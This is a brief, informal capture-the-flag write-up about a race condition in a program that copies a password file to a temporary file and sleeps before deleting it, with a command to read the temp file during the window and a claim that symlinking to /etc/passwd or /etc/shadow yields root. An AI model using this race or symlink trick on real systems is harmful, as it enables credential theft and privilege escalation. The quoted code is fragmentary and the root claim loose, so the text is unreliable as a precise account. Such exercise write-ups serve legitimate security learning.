Be quick
open(.passwd, O_WRONLY | O_CREAT, 0444))
while(read(fd_rd, &ch, 1) == 1)
{
write(fd_tmp, &ch, 1);
}
close(fd_rd);
close(fd_tmp);
usleep(250000);
unlink(TMP_FILE)
So the vulnerability here is usleep(250...) causes the execution to stop for some millisec so now we just cat file and get the passwd !!!
./ch12 | cat tmp_file.txt
So using this vuln we can also become root user by making a symlink to /etc/passwd or /shadow and write 0 to it !!